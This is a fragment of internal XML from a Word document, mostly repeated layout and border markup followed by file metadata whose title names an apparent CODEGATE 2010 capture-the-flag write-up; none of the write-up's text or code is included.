          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="996030420">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1285382623">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1732345753">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="123046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415800">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="937953752">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1449547553">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1410689250">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1035233042">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="30955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9078003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="28185478">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="457183974">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1745646170">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="727340404">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="185383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377991">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="263272119">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1243678641">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="696781323">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="48920145">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="103391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8181777">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1164201160">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1398817151">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="827017270">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="213548152">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="26581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1238867">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="791871550">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="978418174">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1064330559">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1249577122">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="53720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963433">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1091665400">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="673149284">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="750467043">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="868686958">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="12925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7838711">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1231579268">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1795828494">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="307052187">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="871383909">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="10811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8399818">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1928690552">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2085302131">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="399712642">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2004817385">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="49094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4165660">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1071345388">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1685013487">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1500272465">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1129860837">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="197945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1461357">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="548147851">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1803571270">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="201089464">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="282925788">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="145733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2750</Words>
  <Characters>15678</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>130</Lines>
  <Paragraphs>36</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>タイトル</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>CODEGATE2010_CTF_WT_sutegoma2</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>18392</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="120" baseType="variant">
      <vt:variant>
        <vt:i4>1441846</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>116</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340770</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>110</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340769</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>104</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340768</vt:lpwstr>
      </vt:variant>
